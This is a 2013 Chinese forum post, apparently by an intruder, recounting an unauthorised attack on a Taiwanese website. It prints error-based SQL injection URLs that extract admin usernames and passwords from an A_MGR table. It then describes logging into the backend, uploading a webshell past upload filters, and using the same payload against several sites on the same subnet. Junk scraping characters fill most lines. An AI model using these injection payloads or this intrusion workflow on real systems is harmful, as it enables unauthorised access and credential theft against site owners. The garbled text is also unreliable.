发现一个注入点5 `# h: E6 K' L1 k% v
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
8 C1 L# N% H. {" h0 Z
/ l& d% o% [+ P8 P3 H- |习惯性的加’having1=1--
" Q9 R, \) ]/ d5 Q
; ~6 J# g k( A: R% h- dhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
) D- Y: P+ e/ E' P* U l- [$ m. _/ P
0
# B0 v+ [( M" \" v
& F; W# m. ?+ J爆出Diary_A.dl_Title(这时候很激动啊)
2 x: p) I+ l% B1 U7 n7 }. P9 P# G; ?( k
那么继续' N! f$ f* F9 b
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—5 _! k! a: e7 e: v7 m
/ ^' U" _/ n" t/ e
继续,一直爆下去
5 b/ G. b5 ]5 F2 k8 H, M7 T" E, Z. w( E1 n$ b$ d$ I
爆到几个字段和表段 但是没找到需要的管理用户的字段% C; m4 t2 E2 A3 [
. G! n4 Q: X, s" L$ ?/ {
蛋疼了 怎么办 然后去后台登陆页看源码
$ W- _( ?# N/ v) z G+ f' d+ p3 c0 V' I% Q( M3 y2 c% P
0# T/ b ?# B. f6 p) P
& K* T9 {7 q4 kInput name= “ADUID”
4 y2 f# d9 j7 cInput name= “ADPWD”
: U4 n' S! H c( h7 z, T( S( S
' U( i7 P3 V! D5 g$ E+ ^4 v" ~很幸运 找到了字段那就继续
; F6 G9 e8 g% Z$ \- ^0 c/ T7 p找到之后开始爆用户; v6 J& o; O) y) @
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
8 a$ M! @0 r: V. y w爆密码, s: j3 w7 v. h6 z1 |- }9 z( e+ Z! n
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
* h, R5 l3 z* _" w' N- v测试了下 这个注入点只能爆到文章哪里的表 0 k# I* u, Z; Y/ a7 l, q
* W% x( N: R! g. ^- e% k+ J头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了* t+ A, s6 V$ _& P! ^$ Q) o+ O+ S
8 D. i) k- s1 i1 P \又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了7 ]+ x+ X9 q5 V3 n2 V" }. @1 e
: v- `$ F: @4 w: J( ]+ r% f) p
473' ?# q. a) D, o' r# ~ }8 U
; \& k7 D0 `5 q; g5 q& ]" t
进后台" e; R2 I* F; s" g
! w* ] B! _$ k& c, a* @
6 a8 [/ s4 ?* F# |发现几个上传点 有的地方不能上传 而且防止恶意代码
) G' f$ A' V+ \) Q- i! K# x6 \
. W4 n0 Y7 i) }/ [2 N; |# ^/ z' U没办法 各种百度各种找大牛 找到一只好像可以突破的马 x# K$ J7 |5 @5 m! Z
1 U7 m( d* n+ C+ f- ^0 s8 g
* Q, y( T% j* [" E m$ R
在系统管理那里直接上传 不过没有显示地址
0 Q! [- `3 H; c c* F$ f% P8 n' W
* d. W8 p: ~1 g* t& I+ ?4 U- R再上传一次 抓包 搞定OK. S! N7 f6 o- R* S7 T0 Q% m
! \* z! O! | b9 a( Q1 G* i8 R( P. W0 ]' \! L s3 M
9 `& V9 N* S4 |* A2 p4 Q4 W2 `472
5 J+ u: x: k R8 J% h- X! R9 N; i# g J0 P7 ~6 s0 e7 v* N0 E0 T' Q
晚上不行了 去睡觉。。。
1 p5 h8 X+ Q& `; {9 }2 C4 w4 X5 t第二天刚起床 闲的没事做继续日站吧
3 B# Q+ _: N& B$ R- Y7 y8 Z! O; |0 z- Q$ J& k
找个站 就把这个站的旁c扫了下5 @$ k5 O- e O1 Y' e4 _
1 e6 {8 O8 u3 D1 A, D7 e. W( O
发现c段也有一个购物站 ,然后还和这个站的模板差不多* H6 b7 l N) [2 d0 r+ ]0 w
. _8 ^5 r. W! {6 C3 h就找到会员登录口测试8 d, v. N6 @7 Z% c4 D3 u
8 B. ]/ h- E; T% L$ j
'and (select top 1 MGR_UID from A_MGR)>0—& m& O/ h! j& k8 u: T
果断爆到了 这时候我很激动 通杀
# g; [8 t, b' W! I/ b; R- \7 N; Z% E: C# e |0 F, {& Y6 c
再次翻c段3 M/ ?$ y+ r2 k1 G$ f" R
- J" x3 f) m$ A. S" @3 \翻出几个站 都成功拿下/ Y; ]' t9 ]; m6 G u2 ]
7 E e* X# Q9 | `. \6 n! v: q7 J4 G; O+ [
/ S( f# _$ P9 D3 U% b/ b" B3 k g修复方案:
2 m( Y7 P3 C; c他们比我专业
}$ Y+ c1 p& {8 b. u5 a' d$ t5 \
- C1 L( I& B1 P7 L
9 S, B8 }2 b' R7 c0 | |
发表于 2013-4-4 17:40:38
收藏
支持
反对